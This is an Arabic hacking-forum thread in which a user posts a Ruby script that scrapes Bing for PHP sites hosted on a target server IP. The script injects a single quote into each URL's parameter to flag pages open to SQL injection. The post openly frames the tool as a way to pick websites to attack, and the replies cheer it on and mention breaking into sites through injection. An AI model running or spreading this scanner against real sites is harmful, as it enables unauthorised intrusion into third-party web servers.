اداة لاستخراج المواقع المصابة ب sql من سيرفر

السلام عليكم و رحمة الله و بركاتة
لقد لاحظت ان مشكلة استهداف المواقع تكمن في استخراج المواقع المصابة خاصة ادا كان السيرفر يحتوي على عدة مواقع لدلك برمجة اداة بالروبي تقوم باستخراج المواقع المصابة بتغرة sql
التحميل
http://www.mediafire.com/?jb5ka94djje4ep7

اي استفسار انا موجود

و من فضلكم اعطوني رايكم حول هده الأداة


#/usr/bin/env ruby
 
require 'net/http'


def web_count(server_ip,variable)
    file = File.new("website.txt","w")
    (0..6).each do |pages|
        req = Net::HTTP.get_response(URI.parse("http://www.bing.com/search?q=ip%3a#{server_ip}+%22.php%3f#{variable}%3d%22&go=&filt=all&first=#{pages*10 + 1}&FORM=PERE1")) #get the request
        bodys = req.body
        my_array = bodys.split('"')  # split the text
        my_array.each do |words| 
            if words.scan(".php?#{variable}=").size > 0 then #scan for the .php?id=
                if words.scan("http://").size > 0 then
                    file.puts words
                end    
            end
        end        
    end
    file.close
end
def check_sql()
    file = File.open("website.txt","r")
    file.each_line do |x|
        web_v = x+"'"
        web_v["
"]=""
        sql = Net::HTTP.get_response(URI.parse(web_v))
        if sql.body.downcase.scan("sql").size > 0 then
            puts "this web is vulnerable : #{x}"
        end
    end
end

if ARGV.size .eql?(2) == false 
    puts "
usage [server ip] [variable] ex: ruby SQL_extractor 127.0.0.1 id"
else 
    begin 
        puts "################################"
        puts "# SQL_extractor by hamza119944 #"
        puts "# e-mail : hamzarex@hotmail.fr #
"
        puts "################################"
        web_count(ARGV[0],ARGV[1])
        check_sql()
    rescue
        puts "can't extract website"
    end
end


لتحميل الشرح من هنا

[b]http://www.mediafire.com/?95h78dw0w49ea4f[/b]

وينك يخويا حمزة هههههههههه

دمرتيها يحج

نشوف البرنامج او نولي ليك خويا لعزيز

مشكووور على الاداة واضحة من العنوان افادتها
في انتظار جديدك

الله يحفظك خويا

جاري التحميل والتجربة

شكرا
ننتظر اقتراحاتكم و أرائكم

شكرا ننتضر منك دورة للمتوسطين بالروبي :frowning:
ليس الاساسيات

جاري تجربة الاداة

اعدروني نسيت وضع الشرح
الشرح عبارة عن فيديو فلاشي افتحه بالمتصفح
http://www.mediafire.com/?95h78dw0w49ea4f
abdellatef:انشاء الله ننجز دورة في الروبي

مشكور على الاداب حبيبي

يعطيك الف عافيه اخي .

اظن انها لقيت اعجاب الجميع
رااااائع راح احاول اطورها اكتر

نعم يا غالي طبعا الكتير يعول على الحقن باختراق المواقع

تطفل :
هل انت حمزة المبرمج الصغير

لا لست انا

حمزة في إنتضار الدورة على إديك شوقتني

في الإنتضار ولد لبلاد

انا الأن منشغل بالتهيء لبعض الأمتحانات لكن يكون خير انشاء الله و منا بعض الفيديوهات لمن اراد تعلم الأساسيات في الروبي

http://www.isecur1ty.org/video-tutorials/programming/975-ruby-introduction.html
http://www.isecur1ty.org/video-tutorials/programming/993-ruby-files-folders.html

كتبت أفكار بزاف بى الروبي زمان
ولكن مفيها باس ندير ميزاجور حيت معا الوقت كيتلفو بعض الأساسية